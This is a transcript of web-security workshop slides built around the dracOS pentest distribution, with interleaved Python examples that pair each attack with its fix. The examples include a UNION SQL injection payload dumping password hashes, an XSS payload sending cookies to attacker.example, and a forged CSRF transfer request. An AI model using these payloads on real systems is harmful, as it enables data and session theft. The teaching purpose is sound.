Web Security Workshop : A Jumpstart
Uploaded by satria-ady-pradana
Category: Technology

Transcript of Web Security Workshop : A Jumpstart
Web Security Workshop: A Jumpstart!
http://xathrya.id/
Satria Ady Pradana
Lightweight and Powerful Penetration Testing OS
Xathrya
# whoami?
• Satria Ady Pradana
  – Junior Security Analyst at MII (Metrodata Group)
  – Researcher at dracOS Dev Team
  – Staff at Reversing.ID
  – Interested in low-level stuff
• Now tell me yours
Dracos Linux is an open source operating system built for penetration testing. It is packed with pentest tools covering information gathering, forensics, malware analysis, maintaining access, and reverse engineering.
We Live by Code and Rise by Ethic
LINUX
• Unix-like operating system for a wide range of devices and hardware.
• Free and open source, licensed under the GNU GPL.
• Created by Linus Torvalds in 1991.
#screetsec Xathrya
Making Linux Distros Great Again
• Derivative: a new distro built on top of an existing distro.
• It has undergone modifications by its author that make it differ from the parent distro.
• Example: Remastering
Linux From Scratch
• A way to build Linux from the very start.
• Not derived from an existing distro.
• Initiated by Gerard Beekmans.
• You build and assemble every part of the system yourself.
Advantages
• Teaches you the internals of an operating system.
• Flexible: do as you wish.
• Full control over your system.
INTRODUCING
• Open source
• Built from scratch
• Specially crafted for Cyber Security
THE PHILOSOPHY
The name dracOs comes from the Komodo dragon, a rare species found only in the Indonesian archipelago. Inspired by the Komodo's character:
• Strong enough to kill its prey with minimum force.
• Its mouth carries various bacteria and viruses that quickly kill the prey.
HISTORY
• Project initiated on 12 June 2012 by Zico Ekel
• A remastering of Ubuntu 10.04
• The dracOs v2.0 Beta update still used Ubuntu
• Project restarted in December 2015 with a radical change: adopting LFS
OLD SCHOOL STYLE
WHY?
I am a l33t h@cker
LMAO
Doing something, but not knowing what they are doing.
SOMEWHERE
IT HAPPENS
So... DRACOS LINUX
FEATURES IN DRACOS
GTK MENU
FIRE UP THE VM
# In this Lab
• Install dracOs
• Configure network (use NAT or bridge)
• Ping my machine from dracOs
• Try the user interface (DWM)
• Install a package
ARE YOU A HACKER?
You might be, but I am not
Information Security is Like Football

Formation = Framework
- ISO/IEC 27001
- NIST SP 800 (Computer Security)
- PCI DSS
- HIPAA
- ISMF

Position = Role
- GK / Defender: Sysadmin, Network, Firewall, SIEM, etc.
- Midfielder: InfoSec Officer, Risk Management, Internal Compliance, etc.
- Striker: InfoSec Consultant, Pentester, etc.
- Coach: Top Management, CISO
- Supporter: Stakeholder

rungga_reksya

I am sure you are interested in offensive penetration testing.
Three Critical Components of Information Security (CIA)
• Confidentiality
• Integrity
• Availability
Penetration Testing Methodologies and Standards

Penetration Testing: Black Box, White Box, Gray Box
Penetration Testing Frameworks
• WASC – Web Application Security Consortium Threat Classification
• OSSTMM – Open Source Security Testing Methodology Manual
• OWASP – Open Web Application Security Project Testing Guide
OWASP Top 10 – 2010 (old) vs. OWASP Top 10 – 2013 (new)

2010-A1 – Injection                                    | 2013-A1 – Injection
2010-A2 – Cross Site Scripting (XSS)                   | 2013-A2 – Broken Authentication and Session Management
2010-A3 – Broken Authentication and Session Management | 2013-A3 – Cross Site Scripting (XSS)
2010-A4 – Insecure Direct Object References            | 2013-A4 – Insecure Direct Object References
2010-A5 – Cross Site Request Forgery (CSRF)            | 2013-A5 – Security Misconfiguration
2010-A6 – Security Misconfiguration                    | 2013-A6 – Sensitive Data Exposure
2010-A7 – Insecure Cryptographic Storage               | 2013-A7 – Missing Function Level Access Control
2010-A8 – Failure to Restrict URL Access               | 2013-A8 – Cross-Site Request Forgery (CSRF)
2010-A9 – Insufficient Transport Layer Protection      | 2013-A9 – Using Known Vulnerable Components (NEW)
2010-A10 – Unvalidated Redirects and Forwards (NEW)    | 2013-A10 – Unvalidated Redirects and Forwards

3 primary changes:
• Merged: 2010-A7 and 2010-A9 -> 2013-A6 (Sensitive Data Exposure)
• Added: 2013-A9 – Using Known Vulnerable Components (new)
• Broadened: 2010-A8 -> 2013-A7 (Missing Function Level Access Control)

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SQL Injection
• Injecting snippets of SQL syntax so the database returns information to us that the developer never intended.
• Root cause: unsanitized input.
• Things you should know:
  • Basics of SQL
  • UNION
  • DBMS-specific behaviour
  • Unicode and character representation
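The UNION technique from the slide, as an added example that is not part of the workshop material: a search query built by string formatting, the injected payload that makes it return rows from a table the page never meant to expose, and the parameterized fix. The schema, rows and payload are constructed for illustration.

```python
"""UNION-based SQL injection against a string-built query, next to the
parameterized fix. Added example, not workshop code: the schema, rows and
payload are constructed for illustration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database: a public products table and a users table that the
    product search was never meant to expose. Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, price TEXT);
        INSERT INTO products VALUES ('apple', '1.00');
        INSERT INTO products VALUES ('banana', '0.50');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """Vulnerable: the user-controlled term is spliced into the SQL text, so a
    quote in the term ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name, price FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Fixed: a bound parameter. The driver passes the term as a value, so the
    statement's structure cannot change whatever the term contains."""
    sql = "SELECT name, price FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


# Constructed UNION payload. The injected SELECT must return the same number of
# columns (two) as the original query, and the trailing '--' comments out the
# closing quote the application appends.
UNION_PAYLOAD = "' UNION SELECT username, password_hash FROM users --"


if __name__ == "__main__":
    db = make_db()
    print("normal:    ", search_vulnerable(db, "apple"))
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("safe:      ", search_safe(db, UNION_PAYLOAD))
```

The column-count requirement is why real attacks start by probing with `ORDER BY n` or `UNION SELECT NULL, NULL, ...` until the query stops erroring; the comment syntax (`--`, `#`, `/* */`) and the names of metadata tables are among the DBMS-specific details the slide refers to.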
Cross-Site Scripting (XSS)
• Injecting client-side script into a web page viewed by (other) users.
• Root cause: unsanitized input.
• Things you should know:
  • Reflected
  • Persistent
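Reflected versus persistent XSS, as an added example that is not part of the workshop material: a search page that echoes the URL query back (reflected), a comment board that stores the payload and serves it to every later visitor (persistent), and the HTML-escaping fix for both. The markup, board and payload are constructed; `attacker.example` is a placeholder host.

```python
"""Reflected and persistent (stored) XSS in a toy comment board, with the
HTML-escaping fix. Added example, not workshop code: the markup, board and
payload are constructed for illustration."""
import html

# Constructed attacker payload: script that ships the victim's cookies to a
# host the attacker controls (attacker.example is a placeholder name).
XSS_PAYLOAD = (
    '<script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the query from the URL is echoed straight into the page.
    One crafted link is enough; the script runs when the victim clicks it."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Fix: escape untrusted data for the HTML context it is placed in.
    quote=True also neutralises quotes, which matters inside attributes."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


class CommentBoard:
    """Persistent XSS: the payload is stored server-side once and then served
    to every later visitor, not only the one who clicked a link."""

    def __init__(self) -> None:
        self.comments: list = []

    def post(self, comment: str) -> None:
        self.comments.append(comment)

    def render_vulnerable(self) -> str:
        return "<ul>" + "".join(f"<li>{c}</li>" for c in self.comments) + "</ul>"

    def render_safe(self) -> str:
        return "<ul>" + "".join(
            f"<li>{html.escape(c, quote=True)}</li>" for c in self.comments
        ) + "</ul>"


def has_live_script(page: str) -> bool:
    """Crude marker used here: did a <script> tag survive into the page?"""
    return "<script>" in page


if __name__ == "__main__":
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
    board = CommentBoard()
    board.post("nice article")
    board.post(XSS_PAYLOAD)          # one attacker post ...
    print(board.render_vulnerable())  # ... served to everyone who loads the page
    print(board.render_safe())
```

Escaping is context-dependent: `html.escape` is right for HTML text and quoted attributes, but data placed inside a `<script>` block, a URL, or an unquoted attribute needs the encoding for that context, and a Content-Security-Policy is worth adding as a second layer.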
Cross-Site Request Forgery (CSRF)
• Unauthorized commands are transmitted from a user the website trusts, so the site treats them as valid, authorized commands.
• Exploits the trust that a site has in the user's browser.
• Things you should know:
  • Reflected
  • Persistent
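The browser-trust problem from the slide, as an added example that is not part of the workshop material: a money-transfer handler that accepts any request carrying a valid session cookie, the forged request an attacker's hidden form would produce, and the synchronizer-token fix that rejects it. The handlers, secret, session store and request dicts are constructed for illustration.

```python
"""CSRF: a state-changing request accepted on the session cookie alone, next
to a synchronizer-token check that rejects the forged cross-site request.
Added example, not workshop code: the handlers, secret, session store and
request dicts are constructed for illustration."""
import hashlib
import hmac

# Constructed server-side secret; real deployments load it from configuration.
SERVER_SECRET = b"constructed-demo-secret"


def csrf_token_for(session_id: str) -> str:
    """Per-session token = HMAC(secret, session_id). The server embeds it in
    its own forms; an attacker's page can make the victim's browser send
    cookies, but cannot read the victim's pages to learn this value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _apply_transfer(user: str, form: dict, balances: dict) -> None:
    amount = int(form["amount"])
    balances[user] -= amount
    balances[form["to"]] = balances.get(form["to"], 0) + amount


def transfer_vulnerable(request: dict, sessions: dict, balances: dict) -> str:
    """Vulnerable: any request carrying a valid session cookie is honoured.
    Browsers attach cookies automatically, so an auto-submitting form on the
    attacker's site performs a transfer the logged-in victim never intended."""
    user = sessions.get(request["cookies"].get("session"))
    if user is None:
        return "401 not logged in"
    _apply_transfer(user, request["form"], balances)
    return "200 transferred"


def transfer_safe(request: dict, sessions: dict, balances: dict) -> str:
    """Fix: additionally require the session-bound token that only the genuine
    form could have carried. Constant-time comparison avoids a timing leak."""
    sid = request["cookies"].get("session")
    user = sessions.get(sid)
    if user is None:
        return "401 not logged in"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(sid)):
        return "403 csrf check failed"
    _apply_transfer(user, request["form"], balances)
    return "200 transferred"


def forged_request(session_cookie: str) -> dict:
    """What the attacker's hidden form produces: the victim's cookie rides
    along, the amount and recipient are the attacker's, and there is no token."""
    return {"cookies": {"session": session_cookie},
            "form": {"to": "attacker", "amount": "100"}}


def genuine_request(session_cookie: str) -> dict:
    """The same action submitted from the site's own form, token included."""
    return {"cookies": {"session": session_cookie},
            "form": {"to": "friend", "amount": "10",
                     "csrf_token": csrf_token_for(session_cookie)}}


if __name__ == "__main__":
    sessions = {"sess-abc123": "alice"}   # constructed: cookie value -> user
    balances = {"alice": 500}
    print(transfer_vulnerable(forged_request("sess-abc123"), sessions, dict(balances)))
    print(transfer_safe(forged_request("sess-abc123"), sessions, dict(balances)))
    print(transfer_safe(genuine_request("sess-abc123"), sessions, dict(balances)))
```

The token must be unguessable and bound to the session, and it must be checked on every state-changing request, not only on GET-vs-POST. The `SameSite` cookie attribute that modern browsers apply by default reduces the exposure but does not replace the check.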
# In this Lab
• Trying SQL Injection
• Trying XSS
• Trying CSRF
Your target is ...
When you are aiming for a Professional Career
Exploit Databases
36845 exploits archived, 82454 CVE IDs, 3000 Metasploit modules, etc.

1. Exploit DB – https://www.exploit-db.com
2. Packet Storm – https://packetstormsecurity.com
3. Common Vulnerabilities & Exposures – https://cve.mitre.org
4. Rapid 7 – https://www.rapid7.com/db/modules
Bug Bounty Programs
• Bug Crowd – https://bugcrowd.com
• Bug Sheet – http://bugsheet.com
• Hacker One – https://hackerone.com
• Fire Bounty – https://firebounty.com
• Bounty Factory – https://bountyfactory.io
• Open Bug Bounty – https://www.openbugbounty.org
Concept of Takeover System
(diagram; nodes: SQL Injection, Login to MySQL, Make Form Upload, XSS, Phishing, Login to App, Upload File, Shell, PWN SVR)
NMAP Features
PORT STATES
1. Open: an application is listening for connections on this port.
2. Closed: the probes were received, but no application is listening on this port.
3. Filtered: the probes were not received and the state could not be established; the probes are being dropped by some kind of filtering.
4. Unfiltered: the probes were received, but a state could not be established.
5. Open|Filtered: the port is either filtered or open, but Nmap couldn't establish which.
6. Closed|Filtered: the port is either filtered or closed, but Nmap couldn't establish which.
# In this Lab
• Good Luck!